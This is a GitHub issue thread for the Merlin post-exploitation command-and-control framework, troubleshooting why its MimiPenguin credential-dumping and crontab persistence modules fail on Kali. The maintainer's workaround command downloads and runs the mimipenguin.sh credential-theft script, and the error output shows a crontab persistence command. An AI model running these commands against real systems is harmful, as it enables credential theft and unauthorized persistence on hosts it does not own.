MimiPenguin & BASH Path Error

Ne0nd0g / merlin

Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.

GNU General Public License v3.0

5.03k stars 798 forks source link

MimiPenguin & BASH Path Error #114

Open P-T001 opened 3 years ago

P-T001 commented 3 years ago

Hi There, I looked for several post-c2 development frameworks. Finally, I thought Merlin was better and easy to install, but now I have a problem. I casually tested several modules and each time it was "not found" and "exit status code 127". But I can use the echoed command directly

error： [-] Results job lkqFILVvZK for agent f8eb12ec-3fef-4f17-8763-c230x7a791aa at 2021-08-09T08:51:18Z

[+] /bin/sh: 1: (crontab -l 2>/dev/null; echo " * /bin/bash -c") | crontab - && echo crontab successfully modified.: not found

[!] exit status 127

Prerequisite

[x] I have read the README
[x] I have search the opened & closed issues
[x] I have search the WIKI and its FAQ page
Environment Data
- Merlin Version:
- Merlin Build:
- Go Version:go1.15.9 linux/amd64
- GOPATH Environment Variable:
- GOROOT Environment Variable:
- Operating System: kali-linux-2020.2-amd64

Ne0nd0g commented 3 years ago

Can you please share the following information:

A list of module names that were not found
A list of module names that returned an error
The Merlin Server version and build
The Merlin Agent version, build, and operating system

P-T001 commented 3 years ago

以下信息：

A list of module names that were not found： I don't understand what you mean

A list of module names that returned an error：（I tested that both modules reported the above 127 errors） linux/x64/bash/credentials/MimiPenguin linux/x64/bash/persistence/CrontabPersistence

The Merlin Server version and build: Version: 1.1.0 system：kali-linux-2020.2-amd64 、go1.15.9 linux/amd64 *The Merlin Agent version, build, and operating system: Version: 1.0.2 system：kali-linux-2020.2-amd64 、go1.15.9 linux/amd64

Ne0nd0g commented 3 years ago

You said:

I casually tested several modules and each time it was "not found"

What modules did you test that were "not found"?

The problem is that the module is for BASH but Kali uses Debian Almquist shell (dash). The symbolic link for /bin/sh on Kali points to /usr/bin/dash. The modules are causing an error because they are using /bin/bash which does not exist on Kali.

A temporary work around is to replace the commands list with:

    "commands": [
      "/bin/sh", "-c", "wget -O /tmp/mimipenguin.sh https://raw.githubusercontent.com/huntergregal/mimipenguin/beta-1.0/mimipenguin.sh;bash /tmp/mimipenguin.sh && rm /tmp/mimipenguin.sh"
    ]

I will work on fixing the code.

P-T001 commented 3 years ago

"Not found" refers to the error message in error code 127. It is not that the module cannot be found. I think it should be the problem you said: use "/bin/bash" that does not exist on Kali

Ne0nd0g / merlin

MimiPenguin & BASH Path Error #114

Prerequisite

Environment Data